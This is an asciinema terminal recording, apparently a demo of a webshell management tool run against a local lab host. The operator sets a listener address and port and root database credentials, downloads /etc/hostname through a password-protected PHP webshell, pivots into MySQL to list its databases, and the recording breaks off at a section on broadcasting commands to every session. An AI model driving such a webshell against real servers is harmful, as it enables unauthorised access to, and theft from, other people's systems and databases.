[22.6715, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102met LPORT 4444\u001b[13D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.7331, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.7948, "o", "\u001b[?25l\u001b[?7l\u001b[2D\u001b[0;32mset\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.8563, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.9181, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mD\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[22.9801, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mB\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.0419, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m_\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.1038, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mE\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.1657, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mN\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.2278, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mG\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.2898, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mI\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.352, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mN\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.4137, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mE\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.4753, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.5369, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.5988, "o", "\u001b[?25l\u001b[?7l\u001b[0;33my\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.6604, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.7221, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mq\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.7839, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.8455, "o", "\u001b[?25l\u001b[?7l\u001b[48D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mset\u001b[0m \u001b[0;33mDB_ENGINE\u001b[0m \u001b[0;33mmysql\u001b[48D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[23.8461, "o", "\u001b[1;32m[+] DB_ENGINE => mysql\u001b[0m\r\n"]
[23.8466, "o", "\u001b[6n"]
[23.8473, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.848, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.5527, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102met DB_ENGINE mysql\u001b[18D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.615, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.6773, "o", "\u001b[?25l\u001b[?7l\u001b[2D\u001b[0;32mset\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.7399, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.8022, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mD\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.8645, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mB\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.927, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m_\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[24.9893, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mH\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.0508, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mO\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.1125, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mS\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.1742, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mT\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.236, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.2976, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.3593, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.4209, "o", "\u001b[?25l\u001b[?7l\u001b[43D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mset\u001b[0m \u001b[0;33mDB_HOST\u001b[0m \u001b[0;33mdb\u001b[43D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[25.4215, "o", "\u001b[1;32m[+] DB_HOST => db\u001b[0m\r\n"]
[25.422, "o", "\u001b[6n"]
[25.4226, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.4234, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.1274, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102met DB_HOST db\u001b[13D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.1891, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.2508, "o", "\u001b[?25l\u001b[?7l\u001b[2D\u001b[0;32mset\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.3133, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.3757, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mD\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.4375, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mB\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.499, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m_\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.561, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mU\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.6225, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mS\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.6841, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mE\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.7457, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mR\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.8073, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.869, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.9311, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.9927, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.0546, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.1163, "o", "\u001b[?25l\u001b[?7l\u001b[45D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mset\u001b[0m \u001b[0;33mDB_USER\u001b[0m \u001b[0;33mroot\u001b[45D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.1163, "o", "\u001b[?2004l"]
[27.117, "o", "\u001b[1;32m[+] DB_USER => root\u001b[0m\r\n"]
[27.1174, "o", "\u001b[6n"]
[27.118, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.1188, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.8224, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[0;38;2;102;102;102met DB_USER root\u001b[15D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.8839, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.9455, "o", "\u001b[?25l\u001b[?7l\u001b[2D\u001b[0;32mset\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.007, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.0688, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mD\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.1303, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mB\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.1919, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m_\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.2535, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mP\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.3151, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mA\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.3767, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mS\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.4384, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mS\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.5, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.5617, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.6232, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.6847, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.7464, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.8083, "o", "\u001b[?25l\u001b[?7l\u001b[45D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mset\u001b[0m \u001b[0;33mDB_PASS\u001b[0m \u001b[0;33mroot\u001b[45D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[28.809, "o", "\u001b[1;32m[+] DB_PASS => root\u001b[0m\r\n"]
[28.8095, "o", "\u001b[6n"]
[28.8101, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.8108, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.5142, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.5758, "o", "\u001b[?25l\u001b[?7l\u001b[0mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.6373, "o", "\u001b[?25l\u001b[?7l\u001b[0mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.6988, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.7604, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.8218, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.8834, "o", "\u001b[?25l\u001b[?7l\u001b[6D\u001b[0;32moptions\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.945, "o", "\u001b[?25l\u001b[?7l\u001b[36D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32moptions\u001b[36D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.945, "o", "\u001b[?2004l"]
[29.9462, "o", "\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\r\n\u2503\u001b[1;36m \u001b[0m\u001b[1;36msetting  \u001b[0m\u001b[1;36m \u001b[0m\u2503\u001b[1;36m \u001b[0m\u001b[1;36mvalue     \u001b[0m\u001b[1;36m \u001b[0m\u2503\r\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\r\n\u2502 LHOST     \u2502 172.16.1.1 \u2502\r\n\u2502 LPORT     \u2502 4444       \u2502\r\n\u2502 RANGE     \u2502            \u2502\r\n\u2502 PORTS     \u2502            \u2502\r\n\u2502 DB_ENGINE \u2502 mysql      \u2502\r\n\u2502 DB_HOST   \u2502 db         \u2502\r\n\u2502 DB_USER   \u2502 root       \u2502\r\n\u2502 DB_PASS   \u2502 root       \u2502\r\n\u2502 DB_NAME   \u2502            \u2502\r\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\r\n"]
[29.9467, "o", "\u001b[6n"]
[29.9472, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.948, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[32.1551, "o", "\r\n\u001b[38;5;39m\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u001b[0m\r\n\u001b[1;38;5;231;48;5;25m  \u25b6  Files & database \u2014 aliases + the DB manager (uses DB_* above)  \u001b[0m\r\n\u001b[38;5;39m\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u001b[0m\r\n\r\n"]
[33.9629, "o", "\u001b[?25l\u001b[?7l\u001b[0md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.0247, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.0861, "o", "\u001b[?25l\u001b[?7l\u001b[0mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.1477, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.2092, "o", "\u001b[?25l\u001b[?7l\u001b[0ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.2708, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.3324, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.3948, "o", "\u001b[?25l\u001b[?7l\u001b[7D\u001b[0;36mdownload\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.4567, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.5184, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.5807, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.6425, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.7043, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.7662, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.8278, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.8894, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.9513, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.0138, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.0755, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.1377, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.1995, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.2614, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.3231, "o", "\u001b[?25l\u001b[?7l\u001b[51D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;36mdownload\u001b[0m \u001b[0;33m/etc/hostname\u001b[51D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[35.3244, "o", "\u001b[95m[+] [download] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[35.3284, "o", "\u001b[1;32m[+] Saved /etc/hostname -> \u001b[0m\r\n\u001b[1;32m/home/ubuntu/Documents/dev/WangYihang/Webshell-Sniper/127.0.0.1:8080/etc/hostname (13 bytes)\u001b[0m\r\n"]
[35.329, "o", "\u001b[6n"]
[35.3297, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.3304, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.1385, "o", "\u001b[?25l\u001b[?7l\u001b[0mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.2003, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.2618, "o", "\u001b[?25l\u001b[?7l\u001b[0mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.3232, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.385, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mpivot\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.447, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.5093, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.5711, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.6331, "o", "\u001b[?25l\u001b[?7l\u001b[37D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html > \u001b[0;32mpivot\u001b[0m \u001b[0;33mdb\u001b[37D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[37.6343, "o", "\u001b[95m[+] [database:mysql] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[37.6535, "o", "\u001b[1;32m[+] Connected.\u001b[0m\r\n"]
[37.6605, "o", "\u001b[6n"]
[37.6618, "o", "\u001b[?2004h\u001b[?1l\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m >\u001b[6D\u001b[7C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.6636, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[39.8521, "o", "\u001b[?25l\u001b[?7l\u001b[0md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[39.9137, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[39.9751, "o", "\u001b[?25l\u001b[?7l\u001b[0mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.0365, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.0984, "o", "\u001b[?25l\u001b[?7l\u001b[0mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.1599, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.2217, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.2832, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.3447, "o", "\u001b[?25l\u001b[?7l\u001b[8D\u001b[0;32mdatabases\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.4063, "o", "\u001b[?25l\u001b[?7l\u001b[16D\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m > \u001b[0;32mdatabases\u001b[16D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.4063, "o", "\u001b[?2004l"]
[40.4383, "o", "\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\r\n\u2503\u001b[1;36m \u001b[0m\u001b[1;36mDatabase/Schema   \u001b[0m\u001b[1;36m \u001b[0m\u2503\r\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\r\n\u2502 mysql              \u2502\r\n\u2502 information_schema \u2502\r\n\u2502 performance_schema \u2502\r\n\u2502 sys                \u2502\r\n\u2502 benchmark          \u2502\r\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\r\n"]
[40.439, "o", "\u001b[6n"]
[40.4399, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m >\u001b[6D\u001b[7C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.441, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.0079, "o", "\u001b[?25l\u001b[?7l\u001b[0mq\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.0701, "o", "\u001b[?25l\u001b[?7l\u001b[0mu\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.1323, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.1943, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mquit\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.2558, "o", "\u001b[?25l\u001b[?7l\u001b[11D\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m > \u001b[0;32mquit\u001b[11D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.2558, "o", "\u001b[?2004l"]
[42.2568, "o", "\u001b[6n"]
[42.2574, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m [0] /var/www/html >\u001b[28D\u001b[29C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[42.2581, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.2614, "o", "\r\n\u001b[38;5;39m\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u001b[0m\r\n\u001b[1;38;5;231;48;5;25m  \u25b6  Broadcast \u2014 run one command on every session  